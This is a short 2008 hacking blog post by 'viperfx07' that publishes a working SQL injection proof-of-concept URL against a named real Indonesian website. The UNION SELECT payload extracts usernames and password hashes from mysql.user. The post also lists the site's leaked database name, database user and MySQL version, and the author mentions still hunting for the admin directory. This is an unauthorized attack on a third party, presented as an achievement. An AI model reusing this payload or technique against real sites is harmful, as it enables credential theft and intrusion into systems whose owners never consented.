viperfx07 blog (hack + crack + web + app)

viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Saturday, September 27, 2008

[SQLi] http://www.sonora.co.id

6:49 PM Posted by viperfx07 No comments
PoC: http://www.sonora.co.id/page.php?m=jaringan&i=-1+union+select%201,2,3,4,5,6,7,unhex(hex(concat_ws(0x10,user,password))),9,10,11,12,13,14,15,16+from+mysql.user--

Problem: still don't know what to do here :) mysql v4 prevented me to extract the database. Admin directory location is still unknown.

Database info:Database: sonora_web
User: aha@localhost
Version: 4.1.7-nt

0 comments:

Post a Comment